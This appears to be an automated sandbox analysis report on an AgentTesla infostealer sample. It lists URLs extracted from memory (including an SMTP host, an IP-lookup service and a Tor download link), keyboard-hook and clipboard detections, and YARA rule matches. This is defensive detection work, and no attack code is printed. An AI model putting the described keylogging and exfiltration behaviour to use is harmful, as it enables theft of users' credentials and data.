          Source: file.exe, 0000000C.00000002.3836582111.0000000006C70000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3819530128.0000000003433000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3834975337.00000000067F0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3819530128.0000000003578000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3819530128.0000000003320000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3819530128.00000000033AA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3819530128.0000000003637000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3819530128.0000000003703000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3835427129.000000000686F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3834975337.0000000006826000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3819530128.0000000003603000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3814289105.0000000001547000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3819530128.00000000034ED000.00000004.00000800.00020000.00000000.sdmp, NnXVkDOvj.exe, 00000010.00000002.3835665760.000000000639B000.00000004.00000020.00020000.00000000.sdmp, NnXVkDOvj.exe, 00000010.00000002.3819306651.0000000002E6A000.00000004.00000800.00020000.00000000.sdmp, NnXVkDOvj.exe, 00000010.00000002.3834580704.00000000060E2000.00000004.00000020.00020000.00000000.sdmp, NnXVkDOvj.exe, 00000010.00000002.3819306651.0000000002EC7000.00000004.00000800.00020000.00000000.sdmp, NnXVkDOvj.exe, 00000010.00000002.3819306651.0000000002DE2000.00000004.00000800.00020000.00000000.sdmp, NnXVkDOvj.exe, 00000010.00000002.3813418034.0000000000C48000.00000004.00000020.00020000.00000000.sdmp, NnXVkDOvj.exe, 00000010.00000002.3819306651.0000000002CA9000.00000004.00000800.00020000.00000000.sdmp, NnXVkDOvj.exe, 00000010.00000002.3834001786.0000000006050000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/rootr103
          Source: file.exe, 0000000C.00000002.3814289105.00000000015C9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3836582111.0000000006C70000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3819530128.0000000003433000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3834975337.00000000067F0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3819530128.0000000003578000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3819530128.0000000003320000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3819530128.00000000033AA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3819530128.0000000003637000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3819530128.0000000003703000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3835427129.000000000686F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3819530128.0000000003603000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3819530128.00000000034ED000.00000004.00000800.00020000.00000000.sdmp, NnXVkDOvj.exe, 00000010.00000002.3835665760.000000000639B000.00000004.00000020.00020000.00000000.sdmp, NnXVkDOvj.exe, 00000010.00000002.3819306651.0000000002E6A000.00000004.00000800.00020000.00000000.sdmp, NnXVkDOvj.exe, 00000010.00000002.3819306651.0000000002EC7000.00000004.00000800.00020000.00000000.sdmp, NnXVkDOvj.exe, 00000010.00000002.3819306651.0000000002DE2000.00000004.00000800.00020000.00000000.sdmp, NnXVkDOvj.exe, 00000010.00000002.3813418034.0000000000C48000.00000004.00000020.00020000.00000000.sdmp, NnXVkDOvj.exe, 00000010.00000002.3819306651.0000000002CA9000.00000004.00000800.00020000.00000000.sdmp, NnXVkDOvj.exe, 00000010.00000002.3834001786.0000000006050000.00000004.00000020.00020000.00000000.sdmp, NnXVkDOvj.exe, 00000010.00000002.3819306651.0000000002BCC000.00000004.00000800.00020000.00000000.sdmp, NnXVkDOvj.exe, 00000010.00000002.3834926074.0000000006126000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr306
          Source: file.exe, 00000000.00000002.1409185613.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, NnXVkDOvj.exe, 0000000D.00000002.1452237670.0000000003230000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: file.exe, 0000000C.00000002.3814289105.00000000015C9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3836582111.0000000006C70000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3819530128.0000000003433000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3834975337.00000000067F0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3819530128.0000000003578000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3819530128.0000000003320000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3819530128.00000000032ED000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3819530128.00000000033AA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3819530128.0000000003637000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3819530128.0000000003703000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3835427129.000000000686F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3834975337.0000000006826000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3819530128.0000000003603000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3819530128.00000000034ED000.00000004.00000800.00020000.00000000.sdmp, NnXVkDOvj.exe, 00000010.00000002.3835665760.000000000639B000.00000004.00000020.00020000.00000000.sdmp, NnXVkDOvj.exe, 00000010.00000002.3819306651.0000000002E6A000.00000004.00000800.00020000.00000000.sdmp, NnXVkDOvj.exe, 00000010.00000002.3819306651.0000000002B10000.00000004.00000800.00020000.00000000.sdmp, NnXVkDOvj.exe, 00000010.00000002.3819306651.0000000002EC7000.00000004.00000800.00020000.00000000.sdmp, NnXVkDOvj.exe, 00000010.00000002.3819306651.0000000002DE2000.00000004.00000800.00020000.00000000.sdmp, NnXVkDOvj.exe, 00000010.00000002.3819306651.0000000002CA9000.00000004.00000800.00020000.00000000.sdmp, NnXVkDOvj.exe, 00000010.00000002.3834001786.0000000006050000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gsrsaovsslca2018.crt07
          Source: file.exe, 0000000C.00000002.3819530128.0000000003433000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3819530128.0000000003578000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3819530128.0000000003320000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3819530128.00000000033AA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3819530128.0000000003637000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3819530128.0000000003703000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3819530128.0000000003603000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3819530128.00000000034ED000.00000004.00000800.00020000.00000000.sdmp, NnXVkDOvj.exe, 00000010.00000002.3819306651.0000000002E6A000.00000004.00000800.00020000.00000000.sdmp, NnXVkDOvj.exe, 00000010.00000002.3819306651.0000000002D5B000.00000004.00000800.00020000.00000000.sdmp, NnXVkDOvj.exe, 00000010.00000002.3819306651.0000000002EC7000.00000004.00000800.00020000.00000000.sdmp, NnXVkDOvj.exe, 00000010.00000002.3819306651.0000000002E9D000.00000004.00000800.00020000.00000000.sdmp, NnXVkDOvj.exe, 00000010.00000002.3819306651.0000000002DE2000.00000004.00000800.00020000.00000000.sdmp, NnXVkDOvj.exe, 00000010.00000002.3819306651.0000000002CA9000.00000004.00000800.00020000.00000000.sdmp, NnXVkDOvj.exe, 00000010.00000002.3819306651.0000000002BCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://smtp.yandex.com
          Source: NnXVkDOvj.exe, 00000010.00000002.3819306651.0000000002A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://vMOWVB.com
          Source: file.exe, 0000000C.00000002.3819530128.0000000003221000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://2QFl69OCGPGUgwM.org
          Source: file.exe, 0000000C.00000002.3819530128.0000000003221000.00000004.00000800.00020000.00000000.sdmp, NnXVkDOvj.exe, 00000010.00000002.3819306651.0000000002A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org%4
          Source: NnXVkDOvj.exe, 00000010.00000002.3819306651.0000000002A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org%GETMozilla/5.0
          Source: file.exe, 0000000C.00000002.3814289105.00000000015C9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3836582111.0000000006C70000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3819530128.0000000003433000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3834975337.00000000067F0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3819530128.0000000003578000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3819530128.0000000003320000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3819530128.00000000032ED000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3819530128.00000000033AA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3819530128.0000000003637000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3819530128.0000000003703000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3835427129.000000000686F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3834975337.0000000006826000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3819530128.0000000003603000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3814289105.0000000001547000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3819530128.00000000034ED000.00000004.00000800.00020000.00000000.sdmp, NnXVkDOvj.exe, 00000010.00000002.3835665760.000000000639B000.00000004.00000020.00020000.00000000.sdmp, NnXVkDOvj.exe, 00000010.00000002.3819306651.0000000002E6A000.00000004.00000800.00020000.00000000.sdmp, NnXVkDOvj.exe, 00000010.00000002.3834580704.00000000060E2000.00000004.00000020.00020000.00000000.sdmp, NnXVkDOvj.exe, 00000010.00000002.3819306651.0000000002B10000.00000004.00000800.00020000.00000000.sdmp, NnXVkDOvj.exe, 00000010.00000002.3819306651.0000000002EC7000.00000004.00000800.00020000.00000000.sdmp, NnXVkDOvj.exe, 00000010.00000002.3819306651.0000000002DE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
          Source: file.exe, 0000000C.00000002.3811121653.0000000000436000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.o
          Source: file.exe, 00000000.00000002.1410116787.00000000040D9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1410116787.0000000004099000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
          Source: file.exe, 0000000C.00000002.3819530128.0000000003221000.00000004.00000800.00020000.00000000.sdmp, NnXVkDOvj.exe, 00000010.00000002.3819306651.0000000002A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha

          Key, Mouse, Clipboard, Microphone and Screen Capturing

          barindex
          Installs a global keyboard hook
          Source: C:\Users\user\Desktop\file.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\file.exeJump to behavior
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\NnXVkDOvj.exe
          Source: C:\Users\user\Desktop\file.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeWindow created: window name: CLIPBRDWNDCLASS

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 12.2.file.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
          Source: 0.2.file.exe.4099970.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
          Source: 0.2.file.exe.4099970.5.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
          Source: 0.2.file.exe.4176818.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
          Source: 0.2.file.exe.4176818.3.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
          Source: 0.2.file.exe.4099970.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
          Source: 0.2.file.exe.4099970.5.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
          Source: 0.2.file.exe.40d9f78.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
          Source: 0.2.file.exe.40d9f78.6.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
          Source: 0.2.file.exe.4176818.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
          Source: 0.2.file.exe.4176818.3.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
          Source: 00000000.00000002.1410116787.0000000004099000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
          Source: 0000000C.00000002.3811121653.0000000000433000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
          Source: 00000010.00000002.3811125875.0000000000430000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
          Source: 0000000C.00000002.3819530128.0000000003221000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
          Source: 00000000.00000002.1410116787.00000000040D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
          Source: 00000010.00000002.3819306651.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
          Source: Process Memory Space: file.exe PID: 7524, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
          Source: Process Memory Space: file.exe PID: 8144, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
          Source: Process Memory Space: file.exe PID: 8144, type: MEMORYSTRMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
          Source: Process Memory Space: NnXVkDOvj.exe PID: 2832, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
          Source: Process Memory Space: NnXVkDOvj.exe PID: 2832, type: MEMORYSTRMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
          Source: C:\Users\user\Desktop\file.exeProcess Stats: CPU usage > 49%
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02ECDD140_2_02ECDD14
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_075903C80_2_075903C8
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_075927280_2_07592728
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_07676EA80_2_07676EA8
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_07679E000_2_07679E00
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_07676E980_2_07676E98
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_07679DF10_2_07679DF1
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_076799C80_2_076799C8
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_077813480_2_07781348
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_07780C300_2_07780C30
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0778B2E00_2_0778B2E0
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0778B2A80_2_0778B2A8
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0B9BD8B00_2_0B9BD8B0
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0B9B58400_2_0B9B5840
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0B9BD8B00_2_0B9BD8B0
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0B9B86B80_2_0B9B86B8
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0B9BE5300_2_0B9BE530
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0B9BE5210_2_0B9BE521
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0BA600400_2_0BA60040
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0BA676D00_2_0BA676D0
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0BA600400_2_0BA60040
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0C2F3C180_2_0C2F3C18
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0C2F0D460_2_0C2F0D46
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0C2FA6E80_2_0C2FA6E8
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0C2F00400_2_0C2F0040
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0C2FA6DB0_2_0C2FA6DB
          Source: C:\Users\user\Desktop\file.exeCode function: 12_2_014A47B412_2_014A47B4
          Source: C:\Users\user\Desktop\file.exeCode function: 12_2_014A5D0812_2_014A5D08
          Source: C:\Users\user\Desktop\file.exeCode function: 12_2_014A69F112_2_014A69F1
          Source: C:\Users\user\Desktop\file.exeCode function: 12_2_014A5C2012_2_014A5C20
          Source: C:\Users\user\Desktop\file.exeCode function: 12_2_016601D012_2_016601D0
          Source: C:\Users\user\Desktop\file.exeCode function: 12_2_0166A53812_2_0166A538
          Source: C:\Users\user\Desktop\file.exeCode function: 12_2_0166B79012_2_0166B790
          Source: C:\Users\user\Desktop\file.exeCode function: 12_2_01669CE812_2_01669CE8
          Source: C:\Users\user\Desktop\file.exeCode function: 12_2_01664E6012_2_01664E60
          Source: C:\Users\user\Desktop\file.exeCode function: 12_2_016BD9D012_2_016BD9D0
          Source: C:\Users\user\Desktop\file.exeCode function: 12_2_016B19B012_2_016B19B0
          Source: C:\Users\user\Desktop\file.exeCode function: 12_2_016BDF5012_2_016BDF50
          Source: C:\Users\user\Desktop\file.exeCode function: 12_2_016BFC5012_2_016BFC50
          Source: C:\Users\user\Desktop\file.exeCode function: 12_2_016B974612_2_016B9746
          Source: C:\Users\user\Desktop\file.exeCode function: 12_2_016B975012_2_016B9750
          Source: C:\Users\user\Desktop\file.exeCode function: 12_2_016B6F8812_2_016B6F88
          Source: C:\Users\user\Desktop\file.exeCode function: 12_2_016B2E4012_2_016B2E40
          Source: C:\Users\user\Desktop\file.exeCode function: 12_2_016B2E3E12_2_016B2E3E
          Source: C:\Users\user\Desktop\file.exeCode function: 12_2_0749206912_2_07492069
          Source: C:\Users\user\Desktop\file.exeCode function: 12_2_0749207812_2_07492078
          Source: C:\Users\user\Desktop\file.exeCode function: 12_2_0166B78F12_2_0166B78F
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeCode function: 13_2_031CDD1413_2_031CDD14
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeCode function: 13_2_076B03C813_2_076B03C8
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeCode function: 13_2_076B272813_2_076B2728
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeCode function: 13_2_076B37C313_2_076B37C3
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeCode function: 13_2_07796EA813_2_07796EA8
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeCode function: 13_2_0779A89013_2_0779A890
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeCode function: 13_2_07799E0013_2_07799E00
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeCode function: 13_2_07796E9813_2_07796E98
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeCode function: 13_2_07799DF113_2_07799DF1
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeCode function: 13_2_077999C813_2_077999C8
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeCode function: 13_2_0C040E9813_2_0C040E98
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeCode function: 16_2_00E301D016_2_00E301D0
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeCode function: 16_2_00E3A53816_2_00E3A538
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeCode function: 16_2_00E3B6D016_2_00E3B6D0
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeCode function: 16_2_00E39CE816_2_00E39CE8
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeCode function: 16_2_00E375B016_2_00E375B0
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeCode function: 16_2_00E8D9D016_2_00E8D9D0
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeCode function: 16_2_00E819B016_2_00E819B0
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeCode function: 16_2_00E8A76816_2_00E8A768
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeCode function: 16_2_00E8DF5016_2_00E8DF50
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeCode function: 16_2_00E8FC5016_2_00E8FC50
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeCode function: 16_2_00E86E9816_2_00E86E98
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeCode function: 16_2_00E82E4016_2_00E82E40
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeCode function: 16_2_00E82E3F16_2_00E82E3F
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeCode function: 16_2_00E8739016_2_00E87390
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeCode function: 16_2_00F847B416_2_00F847B4
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeCode function: 16_2_00F85D0816_2_00F85D08
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeCode function: 16_2_00F869F116_2_00F869F1
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeCode function: 16_2_00F85CC316_2_00F85CC3
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeCode function: 16_2_0636207816_2_06362078
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeCode function: 16_2_0636206716_2_06362067
          Source: file.exe, 00000000.00000002.1410116787.00000000040D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs file.exe
          Source: file.exe, 00000000.00000002.1410116787.00000000040D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWFLUDkTaJOjuCDTIyqEWjICxJjXPC.exe4 vs file.exe
          Source: file.exe, 00000000.00000002.1410116787.00000000040D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs file.exe
          Source: file.exe, 00000000.00000002.1414211784.000000000749F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePowe vs file.exe
          Source: file.exe, 00000000.00000002.1410116787.0000000004099000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWFLUDkTaJOjuCDTIyqEWjICxJjXPC.exe4 vs file.exe
          Source: file.exe, 00000000.00000002.1410116787.0000000004099000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs file.exe
          Source: file.exe, 00000000.00000002.1406443571.000000000137E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs file.exe
          Source: file.exe, 00000000.00000002.1414128119.0000000007450000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs file.exe
          Source: file.exe, 00000000.00000000.1347520626.0000000000D32000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameQhUlY.exe" vs file.exe
          Source: file.exe, 00000000.00000002.1409185613.00000000030D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemscorlib.dllT vs file.exe
          Source: file.exe, 00000000.00000002.1409185613.00000000030D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs file.exe
          Source: file.exe, 00000000.00000002.1409185613.00000000030D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q,\\StringFileInfo\\040904B0\\OriginalFilename vs file.exe
          Source: file.exe, 00000000.00000002.1409185613.00000000030D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameQhUlY.exe" vs file.exe
          Source: file.exe, 00000000.00000002.1409185613.00000000030D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q,\\StringFileInfo\\000004B0\\OriginalFilename vs file.exe
          Source: file.exe, 00000000.00000002.1409185613.00000000030D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Windows.Forms.dllT vs file.exe
          Source: file.exe, 00000000.00000002.1409185613.00000000030D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.dllT vs file.exe
          Source: file.exe, 00000000.00000002.1409185613.00000000030D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Drawing.dllT vs file.exe
          Source: file.exe, 00000000.00000002.1409185613.00000000030D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Configuration.dllT vs file.exe
          Source: file.exe, 00000000.00000002.1409185613.00000000030D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Core.dllT vs file.exe
          Source: file.exe, 00000000.00000002.1409185613.00000000030D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Xml.dllT vs file.exe
          Source: file.exe, 00000000.00000002.1409185613.00000000030D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs file.exe
          Source: file.exe, 00000000.00000002.1409185613.00000000030D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.VisualBasic.DLLT vs file.exe
          Source: file.exe, 00000000.00000002.1409185613.00000000030D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWFLUDkTaJOjuCDTIyqEWjICxJjXPC.exe4 vs file.exe
          Source: file.exe, 00000000.00000002.1415520757.0000000007C80000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs file.exe
          Source: file.exe, 0000000C.00000002.3811121653.0000000000438000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWFLUDkTaJOjuCDTIyqEWjICxJjXPC.exe4 vs file.exe
          Source: file.exe, 0000000C.00000002.3811749862.0000000000FD7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs file.exe
          Source: file.exe, 0000000C.00000002.3814289105.0000000001518000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs file.exe
          Source: file.exeBinary or memory string: OriginalFilenameQhUlY.exe" vs file.exe
          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 12.2.file.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
